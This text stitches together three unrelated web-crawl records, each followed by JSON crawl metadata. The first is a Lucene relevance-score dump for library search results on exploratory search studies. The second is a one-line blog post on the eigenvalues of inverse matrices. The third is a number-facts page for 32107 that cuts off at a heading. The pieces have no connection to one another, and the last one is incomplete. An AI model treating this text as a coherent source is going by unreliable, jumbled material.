= score(doc=4477,freq=2.0), product of:\n0.09547835 = queryWeight, product of:\n1.4592341 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.017783873 = queryNorm\n0.32519853 = fieldWeight in 4477, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.056763574 = weight(abstract_txt:recommendations in 4477) [ClassicSimilarity], result of:\n0.056763574 = score(doc=4477,freq=1.0), product of:\n0.15711898 = queryWeight, product of:\n1.5284147 = boost\n5.780442 = idf(docFreq=362, maxDocs=43254)\n0.017783873 = queryNorm\n0.36127764 = fieldWeight in 4477, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.780442 = idf(docFreq=362, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.10155891 = weight(abstract_txt:performance in 4477) [ClassicSimilarity], result of:\n0.10155891 = score(doc=4477,freq=3.0), product of:\n0.20228504 = queryWeight, product of:\n2.4525833 = boost\n4.6378174 = idf(docFreq=1137, maxDocs=43254)\n0.017783873 = queryNorm\n0.50205845 = fieldWeight in 4477, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n4.6378174 = idf(docFreq=1137, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.04014067 = weight(abstract_txt:users in 4477) [ClassicSimilarity], result of:\n0.04014067 = score(doc=4477,freq=1.0), product of:\n0.17986459 = queryWeight, product of:\n2.8324378 = boost\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.017783873 = queryNorm\n0.22317162 = fieldWeight in 4477, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.287437 = weight(abstract_txt:exploratory in 4477) [ClassicSimilarity], result of:\n0.287437 = score(doc=4477,freq=2.0), product of:\n0.49909198 = queryWeight, product of:\n4.307122 = boost\n6.5157895 = idf(docFreq=173, maxDocs=43254)\n0.017783873 = queryNorm\n0.57591987 = fieldWeight in 4477, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n6.5157895 = idf(docFreq=173, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.31710958 = weight(abstract_txt:search in 4477) [ClassicSimilarity], result of:\n0.31710958 = score(doc=4477,freq=10.0), product of:\n0.4392257 = queryWeight, product of:\n6.761138 = boost\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.017783873 = queryNorm\n0.72197413 = fieldWeight in 4477, product of:\n3.1622777 = tf(freq=10.0), with freq of:\n10.0 = termFreq=10.0\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.48 = coord(12/25)\n```\n2. Zhang, Y.; Broussard, R.; Ke, W.; Gong, X.: Evaluation of a scatter/gather interface for supporting distinct health information search tasks (2014) 0.44\n```0.43697697 = sum of:\n0.43697697 = product of:\n0.9931295 = sum of:\n0.055380356 = weight(abstract_txt:features in 2726) [ClassicSimilarity], result of:\n0.055380356 = score(doc=2726,freq=4.0), product of:\n0.0973642 = queryWeight, product of:\n1.2031687 = boost\n4.550367 = idf(docFreq=1241, maxDocs=43254)\n0.017783873 = queryNorm\n0.56879586 = fieldWeight in 2726, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n4.550367 = idf(docFreq=1241, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.014472736 = weight(abstract_txt:based in 2726) [ClassicSimilarity], result of:\n0.014472736 = score(doc=2726,freq=1.0), product of:\n0.07231799 = queryWeight, product of:\n1.2699765 = boost\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.017783873 = queryNorm\n0.20012636 = fieldWeight in 2726, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.03510609 = weight(abstract_txt:task in 2726) [ClassicSimilarity], result of:\n0.03510609 = score(doc=2726,freq=1.0), product of:\n0.11405223 = queryWeight, product of:\n1.3022033 = boost\n4.924914 = idf(docFreq=853, maxDocs=43254)\n0.017783873 = queryNorm\n0.30780712 = fieldWeight in 2726, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.924914 = idf(docFreq=853, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.036466736 = weight(abstract_txt:improve in 2726) [ClassicSimilarity], result of:\n0.036466736 = score(doc=2726,freq=1.0), product of:\n0.116980486 = queryWeight, product of:\n1.3188142 = boost\n4.987736 = idf(docFreq=801, maxDocs=43254)\n0.017783873 = queryNorm\n0.3117335 = fieldWeight in 2726, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.987736 = idf(docFreq=801, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.07161372 = weight(abstract_txt:tasks in 2726) [ClassicSimilarity], result of:\n0.07161372 = score(doc=2726,freq=3.0), product of:\n0.12719575 = queryWeight, product of:\n1.3751916 = boost\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.017783873 = queryNorm\n0.5630198 = fieldWeight in 2726, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.018469768 = weight(abstract_txt:using in 2726) [ClassicSimilarity], result of:\n0.018469768 = score(doc=2726,freq=1.0), product of:\n0.0850851 = queryWeight, product of:\n1.3775244 = boost\n3.4731848 = idf(docFreq=3646, maxDocs=43254)\n0.017783873 = queryNorm\n0.21707405 = fieldWeight in 2726, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4731848 = idf(docFreq=3646, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.060477845 = weight(abstract_txt:behavior in 2726) [ClassicSimilarity], result of:\n0.060477845 = score(doc=2726,freq=2.0), product of:\n0.13008773 = queryWeight, product of:\n1.3907372 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.017783873 = queryNorm\n0.46490043 = fieldWeight in 2726, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.058635067 = weight(abstract_txt:performance in 2726) [ClassicSimilarity], result of:\n0.058635067 = score(doc=2726,freq=1.0), product of:\n0.20228504 = queryWeight, product of:\n2.4525833 = boost\n4.6378174 = idf(docFreq=1137, maxDocs=43254)\n0.017783873 = queryNorm\n0.2898636 = fieldWeight in 2726, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.6378174 = idf(docFreq=1137, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.08975727 = weight(abstract_txt:users in 2726) [ClassicSimilarity], result of:\n0.08975727 = score(doc=2726,freq=5.0), product of:\n0.17986459 = queryWeight, product of:\n2.8324378 = boost\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.017783873 = queryNorm\n0.49902692 = fieldWeight in 2726, product of:\n2.236068 = tf(freq=5.0), with freq of:\n5.0 = termFreq=5.0\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.287437 = weight(abstract_txt:exploratory in 2726) [ClassicSimilarity], result of:\n0.287437 = score(doc=2726,freq=2.0), product of:\n0.49909198 = queryWeight, product of:\n4.307122 = boost\n6.5157895 = idf(docFreq=173, maxDocs=43254)\n0.017783873 = queryNorm\n0.57591987 = fieldWeight in 2726, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n6.5157895 = idf(docFreq=173, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.2653129 = weight(abstract_txt:search in 2726) [ClassicSimilarity], result of:\n0.2653129 = score(doc=2726,freq=7.0), product of:\n0.4392257 = queryWeight, product of:\n6.761138 = boost\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.017783873 = queryNorm\n0.6040469 = fieldWeight in 2726, product of:\n2.6457512 = tf(freq=7.0), with freq of:\n7.0 = termFreq=7.0\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.0625 = fieldNorm(doc=2726)\n0.44 = coord(11/25)\n```\n3. Ramdeen, S.; Hemminger, B.M.: ¬A tale of two interfaces : how facets affect the library catalog search (2012) 0.38\n```0.37792405 = sum of:\n0.37792405 = product of:\n0.94481015 = sum of:\n0.02046754 = weight(abstract_txt:based in 1552) [ClassicSimilarity], result of:\n0.02046754 = score(doc=1552,freq=2.0), product of:\n0.07231799 = queryWeight, product of:\n1.2699765 = boost\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.017783873 = queryNorm\n0.28302142 = fieldWeight in 1552, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.07021218 = weight(abstract_txt:task in 1552) [ClassicSimilarity], result of:\n0.07021218 = score(doc=1552,freq=4.0), product of:\n0.11405223 = queryWeight, product of:\n1.3022033 = boost\n4.924914 = idf(docFreq=853, maxDocs=43254)\n0.017783873 = queryNorm\n0.61561424 = fieldWeight in 1552, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n4.924914 = idf(docFreq=853, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.036466736 = weight(abstract_txt:improve in 1552) [ClassicSimilarity], result of:\n0.036466736 = score(doc=1552,freq=1.0), product of:\n0.116980486 = queryWeight, product of:\n1.3188142 = boost\n4.987736 = idf(docFreq=801, maxDocs=43254)\n0.017783873 = queryNorm\n0.3117335 = fieldWeight in 1552, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.987736 = idf(docFreq=801, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.041346204 = weight(abstract_txt:tasks in 1552) [ClassicSimilarity], result of:\n0.041346204 = score(doc=1552,freq=1.0), product of:\n0.12719575 = queryWeight, product of:\n1.3751916 = boost\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.017783873 = queryNorm\n0.32505965 = fieldWeight in 1552, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.026120197 = weight(abstract_txt:using in 1552) [ClassicSimilarity], result of:\n0.026120197 = score(doc=1552,freq=2.0), product of:\n0.0850851 = queryWeight, product of:\n1.3775244 = boost\n3.4731848 = idf(docFreq=3646, maxDocs=43254)\n0.017783873 = queryNorm\n0.30698907 = fieldWeight in 1552, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4731848 = idf(docFreq=3646, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.021955254 = weight(abstract_txt:user in 1552) [ClassicSimilarity], result of:\n0.021955254 = score(doc=1552,freq=1.0), product of:\n0.09547835 = queryWeight, product of:\n1.4592341 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.017783873 = queryNorm\n0.22995009 = fieldWeight in 1552, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.068077005 = weight(abstract_txt:assist in 1552) [ClassicSimilarity], result of:\n0.068077005 = score(doc=1552,freq=1.0), product of:\n0.17735732 = queryWeight, product of:\n1.6238707 = boost\n6.1414557 = idf(docFreq=252, maxDocs=43254)\n0.017783873 = queryNorm\n0.38384098 = fieldWeight in 1552, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.1414557 = idf(docFreq=252, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.04014067 = weight(abstract_txt:users in 1552) [ClassicSimilarity], result of:\n0.04014067 = score(doc=1552,freq=1.0), product of:\n0.17986459 = queryWeight, product of:\n2.8324378 = boost\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.017783873 = queryNorm\n0.22317162 = fieldWeight in 1552, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.287437 = weight(abstract_txt:exploratory in 1552) [ClassicSimilarity], result of:\n0.287437 = score(doc=1552,freq=2.0), product of:\n0.49909198 = queryWeight, product of:\n4.307122 = boost\n6.5157895 = idf(docFreq=173, maxDocs=43254)\n0.017783873 = queryNorm\n0.57591987 = fieldWeight in 1552, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n6.5157895 = idf(docFreq=173, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.33258736 = weight(abstract_txt:search in 1552) [ClassicSimilarity], result of:\n0.33258736 = score(doc=1552,freq=11.0), product of:\n0.4392257 = queryWeight, product of:\n6.761138 = boost\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.017783873 = queryNorm\n0.7572129 = fieldWeight in 1552, product of:\n3.3166249 = tf(freq=11.0), with freq of:\n11.0 = termFreq=11.0\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.0625 = fieldNorm(doc=1552)\n0.4 = coord(10/25)\n```\n4. Sahib, N.G.; Tombros, A.; Stockman, T.: ¬A comparative analysis of the information-seeking behavior of visually impaired and sighted searchers (2012) 0.36\n```0.36121774 = sum of:\n0.36121774 = product of:\n0.90304434 = sum of:\n0.027690178 = weight(abstract_txt:features in 1454) [ClassicSimilarity], result of:\n0.027690178 = score(doc=1454,freq=1.0), product of:\n0.0973642 = queryWeight, product of:\n1.2031687 = boost\n4.550367 = idf(docFreq=1241, maxDocs=43254)\n0.017783873 = queryNorm\n0.28439793 = fieldWeight in 1454, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.550367 = idf(docFreq=1241, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.02046754 = weight(abstract_txt:based in 1454) [ClassicSimilarity], result of:\n0.02046754 = score(doc=1454,freq=2.0), product of:\n0.07231799 = queryWeight, product of:\n1.2699765 = boost\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.017783873 = queryNorm\n0.28302142 = fieldWeight in 1454, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.058472365 = weight(abstract_txt:tasks in 1454) [ClassicSimilarity], result of:\n0.058472365 = score(doc=1454,freq=2.0), product of:\n0.12719575 = queryWeight, product of:\n1.3751916 = boost\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.017783873 = queryNorm\n0.45970377 = fieldWeight in 1454, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.018469768 = weight(abstract_txt:using in 1454) [ClassicSimilarity], result of:\n0.018469768 = score(doc=1454,freq=1.0), product of:\n0.0850851 = queryWeight, product of:\n1.3775244 = boost\n3.4731848 = idf(docFreq=3646, maxDocs=43254)\n0.017783873 = queryNorm\n0.21707405 = fieldWeight in 1454, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4731848 = idf(docFreq=3646, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.1047507 = weight(abstract_txt:behavior in 1454) [ClassicSimilarity], result of:\n0.1047507 = score(doc=1454,freq=6.0), product of:\n0.13008773 = queryWeight, product of:\n1.3907372 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.017783873 = queryNorm\n0.8052312 = fieldWeight in 1454, product of:\n2.4494898 = tf(freq=6.0), with freq of:\n6.0 = termFreq=6.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.021955254 = weight(abstract_txt:user in 1454) [ClassicSimilarity], result of:\n0.021955254 = score(doc=1454,freq=1.0), product of:\n0.09547835 = queryWeight, product of:\n1.4592341 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.017783873 = queryNorm\n0.22995009 = fieldWeight in 1454, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.058635067 = weight(abstract_txt:performance in 1454) [ClassicSimilarity], result of:\n0.058635067 = score(doc=1454,freq=1.0), product of:\n0.20228504 = queryWeight, product of:\n2.4525833 = boost\n4.6378174 = idf(docFreq=1137, maxDocs=43254)\n0.017783873 = queryNorm\n0.2898636 = fieldWeight in 1454, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.6378174 = idf(docFreq=1137, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.05676748 = weight(abstract_txt:users in 1454) [ClassicSimilarity], result of:\n0.05676748 = score(doc=1454,freq=2.0), product of:\n0.17986459 = queryWeight, product of:\n2.8324378 = boost\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.017783873 = queryNorm\n0.31561232 = fieldWeight in 1454, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.20324865 = weight(abstract_txt:exploratory in 1454) [ClassicSimilarity], result of:\n0.20324865 = score(doc=1454,freq=1.0), product of:\n0.49909198 = queryWeight, product of:\n4.307122 = boost\n6.5157895 = idf(docFreq=173, maxDocs=43254)\n0.017783873 = queryNorm\n0.40723684 = fieldWeight in 1454, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.5157895 = idf(docFreq=173, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.33258736 = weight(abstract_txt:search in 1454) [ClassicSimilarity], result of:\n0.33258736 = score(doc=1454,freq=11.0), product of:\n0.4392257 = queryWeight, product of:\n6.761138 = boost\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.017783873 = queryNorm\n0.7572129 = fieldWeight in 1454, product of:\n3.3166249 = tf(freq=11.0), with freq of:\n11.0 = termFreq=11.0\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.0625 = fieldNorm(doc=1454)\n0.4 = coord(10/25)\n```\n5. Lorigo, L.; Pan, B.; Hembrooke, H.; Joachims, T.; Granka, L.; Gay, G.: ¬The influence of task and gender on search and evaluation behavior using Google (2006) 0.35\n```0.34901685 = sum of:\n0.34901685 = product of:\n0.7932201 = sum of:\n0.018917676 = weight(abstract_txt:model in 2979) [ClassicSimilarity], result of:\n0.018917676 = score(doc=2979,freq=1.0), product of:\n0.07552557 = queryWeight, product of:\n1.059678 = boost\n4.0076866 = idf(docFreq=2136, maxDocs=43254)\n0.017783873 = queryNorm\n0.2504804 = fieldWeight in 2979, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.0076866 = idf(docFreq=2136, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.014472736 = weight(abstract_txt:based in 2979) [ClassicSimilarity], result of:\n0.014472736 = score(doc=2979,freq=1.0), product of:\n0.07231799 = queryWeight, product of:\n1.2699765 = boost\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.017783873 = queryNorm\n0.20012636 = fieldWeight in 2979, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.049647506 = weight(abstract_txt:task in 2979) [ClassicSimilarity], result of:\n0.049647506 = score(doc=2979,freq=2.0), product of:\n0.11405223 = queryWeight, product of:\n1.3022033 = boost\n4.924914 = idf(docFreq=853, maxDocs=43254)\n0.017783873 = queryNorm\n0.435305 = fieldWeight in 2979, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.924914 = idf(docFreq=853, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.036466736 = weight(abstract_txt:improve in 2979) [ClassicSimilarity], result of:\n0.036466736 = score(doc=2979,freq=1.0), product of:\n0.116980486 = queryWeight, product of:\n1.3188142 = boost\n4.987736 = idf(docFreq=801, maxDocs=43254)\n0.017783873 = queryNorm\n0.3117335 = fieldWeight in 2979, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.987736 = idf(docFreq=801, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.058472365 = weight(abstract_txt:tasks in 2979) [ClassicSimilarity], result of:\n0.058472365 = score(doc=2979,freq=2.0), product of:\n0.12719575 = queryWeight, product of:\n1.3751916 = boost\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.017783873 = queryNorm\n0.45970377 = fieldWeight in 2979, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.026120197 = weight(abstract_txt:using in 2979) [ClassicSimilarity], result of:\n0.026120197 = score(doc=2979,freq=2.0), product of:\n0.0850851 = queryWeight, product of:\n1.3775244 = boost\n3.4731848 = idf(docFreq=3646, maxDocs=43254)\n0.017783873 = queryNorm\n0.30698907 = fieldWeight in 2979, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4731848 = idf(docFreq=3646, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.060477845 = weight(abstract_txt:behavior in 2979) [ClassicSimilarity], result of:\n0.060477845 = score(doc=2979,freq=2.0), product of:\n0.13008773 = queryWeight, product of:\n1.3907372 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.017783873 = queryNorm\n0.46490043 = fieldWeight in 2979, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.021955254 = weight(abstract_txt:user in 2979) [ClassicSimilarity], result of:\n0.021955254 = score(doc=2979,freq=1.0), product of:\n0.09547835 = queryWeight, product of:\n1.4592341 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.017783873 = queryNorm\n0.22995009 = fieldWeight in 2979, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.13330108 = weight(abstract_txt:implicit in 2979) [ClassicSimilarity], result of:\n0.13330108 = score(doc=2979,freq=1.0), product of:\n0.3177618 = queryWeight, product of:\n2.6620939 = boost\n6.7120004 = idf(docFreq=142, maxDocs=43254)\n0.017783873 = queryNorm\n0.41950002 = fieldWeight in 2979, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.7120004 = idf(docFreq=142, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.08975727 = weight(abstract_txt:users in 2979) [ClassicSimilarity], result of:\n0.08975727 = score(doc=2979,freq=5.0), product of:\n0.17986459 = queryWeight, product of:\n2.8324378 = boost\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.017783873 = queryNorm\n0.49902692 = fieldWeight in 2979, product of:\n2.236068 = tf(freq=5.0), with freq of:\n5.0 = termFreq=5.0\n3.570746 = idf(docFreq=3307, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.28363144 = weight(abstract_txt:search in 2979) [ClassicSimilarity], result of:\n0.28363144 = score(doc=2979,freq=8.0), product of:\n0.4392257 = queryWeight, product of:\n6.761138 = boost\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.017783873 = queryNorm\n0.64575326 = fieldWeight in 2979, product of:\n2.828427 = tf(freq=8.0), with freq of:\n8.0 = termFreq=8.0\n3.6529322 = idf(docFreq=3046, maxDocs=43254)\n0.0625 = fieldNorm(doc=2979)\n0.44 = coord(11/25)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69144994,"math_prob":0.99751276,"size":24493,"snap":"2021-31-2021-39","text_gpt3_token_len":9483,"char_repetition_ratio":0.26420024,"word_repetition_ratio":0.5580129,"special_character_ratio":0.5389703,"punctuation_ratio":0.28528422,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998499,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-30T18:57:42Z\",\"WARC-Record-ID\":\"<urn:uuid:22d7c7f1-c4cc-4b3e-80d4-e8d10d230d44>\",\"Content-Length\":\"43049\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:08a3a0c9-185b-46cb-bd45-80791a9266e1>\",\"WARC-Concurrent-To\":\"<urn:uuid:4388be6d-637b-4a99-8538-58a0216e83b2>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"https://ixtrieve.fh-koeln.de/birds/litie/document/39680\",\"WARC-Payload-Digest\":\"sha1:6EBRJQSBFHTH2M3WVHDCEPK53V3DTWOG\",\"WARC-Block-Digest\":\"sha1:DNJEOWYHGLA6I6FGABN4YTC63BKWAERO\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153980.55_warc_CC-MAIN-20210730185206-20210730215206-00691.warc.gz\"}"}
http://albertskblog.blogspot.com/2010/06/
[ "## Thursday, June 10, 2010\n\n### Eigenvalues of an Inverse Matrix\n\nIf lambda is an eigen value of a matrix A, then\n1/lambda is an eigen value of the inverse matrix of A.\n\nhttp://en.wikipedia.org/wiki/Inverse_eigenvalues_theorem" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.58786535,"math_prob":0.9105477,"size":828,"snap":"2019-43-2019-47","text_gpt3_token_len":286,"char_repetition_ratio":0.14199029,"word_repetition_ratio":0.0124223605,"special_character_ratio":0.41545895,"punctuation_ratio":0.07482993,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9925431,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T06:43:31Z\",\"WARC-Record-ID\":\"<urn:uuid:0b5935ca-6757-4890-88e4-33f26d7587e9>\",\"Content-Length\":\"68439\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5a733cfe-6ae6-4304-9617-9a668d05aab6>\",\"WARC-Concurrent-To\":\"<urn:uuid:5084891e-32a0-4c16-8b0b-f0405b5e2ea4>\",\"WARC-IP-Address\":\"172.217.15.97\",\"WARC-Target-URI\":\"http://albertskblog.blogspot.com/2010/06/\",\"WARC-Payload-Digest\":\"sha1:7WDQNMHVNMLZEWVJR4XXKL2T7KF5ED7O\",\"WARC-Block-Digest\":\"sha1:EXXSRH3ZMCN3PPUJ4OPHLYRVZY4HACL6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670731.88_warc_CC-MAIN-20191121050543-20191121074543-00412.warc.gz\"}"}
https://metanumbers.com/32107
[ "# 32107 (number)\n\n32,107 (thirty-two thousand one hundred seven) is an odd five-digits composite number following 32106 and preceding 32108. In scientific notation, it is written as 3.2107 × 104. The sum of its digits is 13. It has a total of 2 prime factors and 4 positive divisors. There are 31,680 positive integers (up to 32107) that are relatively prime to 32107.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 5\n• Sum of Digits 13\n• Digital Root 4\n\n## Name\n\nShort name 32 thousand 107 thirty-two thousand one hundred seven\n\n## Notation\n\nScientific notation 3.2107 × 104 32.107 × 103\n\n## Prime Factorization of 32107\n\nPrime Factorization 97 × 331\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 2 Total number of prime factors rad(n) 32107 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 32,107 is 97 × 331. Since it has a total of 2 prime factors, 32,107 is a composite number.\n\n## Divisors of 32107\n\n1, 97, 331, 32107\n\n4 divisors\n\n Even divisors 0 4 2 2\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 4 Total number of the positive divisors of n σ(n) 32536 Sum of all the positive divisors of n s(n) 429 Sum of the proper positive divisors of n A(n) 8134 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 179.184 Returns the nth root of the product of n divisors H(n) 3.94726 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 32,107 can be divided by 4 positive divisors (out of which 0 are even, and 4 are odd). The sum of these divisors (counting 32,107) is 32,536, the average is 8,134.\n\n## Other Arithmetic Functions 